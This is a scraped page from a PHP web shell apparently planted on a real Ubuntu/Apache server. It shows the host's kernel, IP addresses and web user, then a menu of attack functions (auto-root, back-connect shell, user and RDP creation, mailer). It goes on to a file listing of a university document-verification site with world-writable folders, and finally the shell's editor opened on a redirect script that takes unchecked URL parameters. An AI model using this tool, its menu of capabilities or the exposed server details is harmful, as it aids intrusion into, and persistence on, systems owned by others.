Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.89.197
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
suk_discontinued /
[ HOME SHELL ]
Name
Size
Permission
Action
ExcelWriterXML
[ DIR ]
drwxr-xr-x
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
gradlist
[ DIR ]
drwxr-xr-x
grid
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
gridsrch
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jqGrid4
[ DIR ]
drwxr-xr-x
jqgridn3.5
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libgd-gd-2.2.3
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
misc_files
[ DIR ]
drwxrwxrwx
popups
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
student_photos11
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
teacher_photos
[ DIR ]
drwxrwxrwx
tmpphotos
[ DIR ]
drwxrwxrwx
user_images
[ DIR ]
drwxr-xr-x
validation_files
[ DIR ]
drwxr-xr-x
.htaccess
602
B
-rwxr-xr-x
MainPage.html
11.66
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
Thumbs.db
464
KB
-rwxr-xr-x
a.php
28
B
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
901
B
-rwxr-xr-x
collegeInfoPopup.html
3.75
KB
-rwxr-xr-x
docverify.php
784
B
-rwxr-xr-x
homepage.html
3.05
KB
-rwxr-xr-x
index.html
6.91
KB
-rwxr-xr-x
indexlogin.html
5.74
KB
-rwxr-xr-x
mcverifydet.php
14.83
KB
-rwxr-xr-x
mverifytranscript.php
14.62
KB
-rwxr-xr-x
verification.php
2.68
KB
-rwxr-xr-x
~$sis_manual.rtf
162
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docverify.php
<?php $v1 = $_GET['v1']; $varr = explode('_',$v1); if(count($varr) == 1) { $v1 = $varr[0]; $v5 = '038'; $v6 = 'MC'; } else { $v1 = $varr[2]; $v5 = $varr[0]; $v6 = $varr[1]; } $v2 = $_GET['v2'];//exam A $v3 = $_GET['v3'];//year 20172 $v4 = substr($v3,-1);//type 2 $v3 = substr($v3, 0, -1); //mc_033_regno_exam_year_type.pdf $filename = $v6.'_'.$v5.'_'.$v1.'_'.$v2.'_'.$v3.'_'.$v4.'.pdf'; //var_dump($filename); $url = "http://oasis.logisys.org/suk/doc_verify/".$filename; Redirect($url, true); function Redirect($url, $permanent = false) { if (headers_sent() === false) { header('Location: ' . $url, true, ($permanent === true) ? 301 : 302); } else { echo "header sent"; } exit(); } ?>
Close